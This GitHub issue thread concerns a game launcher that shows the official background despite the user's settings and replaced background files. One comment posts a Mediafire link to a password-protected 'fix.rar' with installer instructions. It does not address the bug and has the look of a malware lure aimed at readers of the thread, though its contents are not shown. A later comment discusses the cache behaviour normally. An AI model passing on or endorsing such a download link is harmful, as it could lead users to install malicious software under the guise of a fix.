### ISSUE TITLE
the launcher does not respect custom backgrounds

### ISSUE THREAD

**Issue by EnderNon** [an-anime-team/an-anime-game-launcher#416]
I set in the settings to not update the background. And I have replaced both background files in the launcher folder here. The issue is that it is still showing the official background after I set it not to.

![image](https://github.com/user-attachments/assets/a46876fc-c094-47ee-97ef-619593499ccf)

![image](https://github.com/user-attachments/assets/424355da-ad49-4c31-bb3c-86a5690b13be)

**Comment by dseynhae** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by sergcam** [comment]
this seems more like a workaround and i dont think this should be the intended behavior. cache is meant to be temp and some distros clear it on reboot as mentioned in #411 . this works as expected (load background from game folder instead of from cache) in honkers  launcher and used to work on here in past versions
